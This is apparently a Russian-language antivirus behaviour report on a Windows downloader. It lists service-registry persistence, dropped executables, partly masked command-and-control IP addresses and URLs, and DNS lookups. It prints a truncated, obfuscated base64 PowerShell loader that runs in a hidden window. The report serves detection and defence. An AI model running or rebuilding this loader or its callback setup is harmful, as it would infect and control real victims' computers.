Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\Wpc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\Wpc] 'ImagePath' = '"%WINDIR%\SysWOW64\msvcr120\Wpc.exe"'
- 'Wpc' "%WINDIR%\SysWOW64\msvcr120\Wpc.exe"
- 'Wpc' %WINDIR%\SysWOW64\msvcr120\Wpc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\d3v93m.exe
- %WINDIR%\syswow64\msvcr120\wpc.exe
- %TEMP%\word\2019\d3v93m.exe в %WINDIR%\syswow64\msvcr120\wpc.exe
- '17#.#1.218.65':80
- '45.#5.36.51':443
- '91.#3.93.99':7080
- '45.##.219.163':443
- '16#.#39.182.217':8080
- http://ch###onghui.cn/wp-content/Z/
- http://16#.###.182.217:8080/krf1V8aC0lu/sLJUSDGKdSjKK4zLq/ via 16#.#39.182.217
- DNS ASK th#####tumsphere.com
- DNS ASK tm####nsulting.com
- DNS ASK is##ap.com
- DNS ASK ch###onghui.cn
- '%TEMP%\word\2019\d3v93m.exe'
- '%WINDIR%\syswow64\msvcr120\wpc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)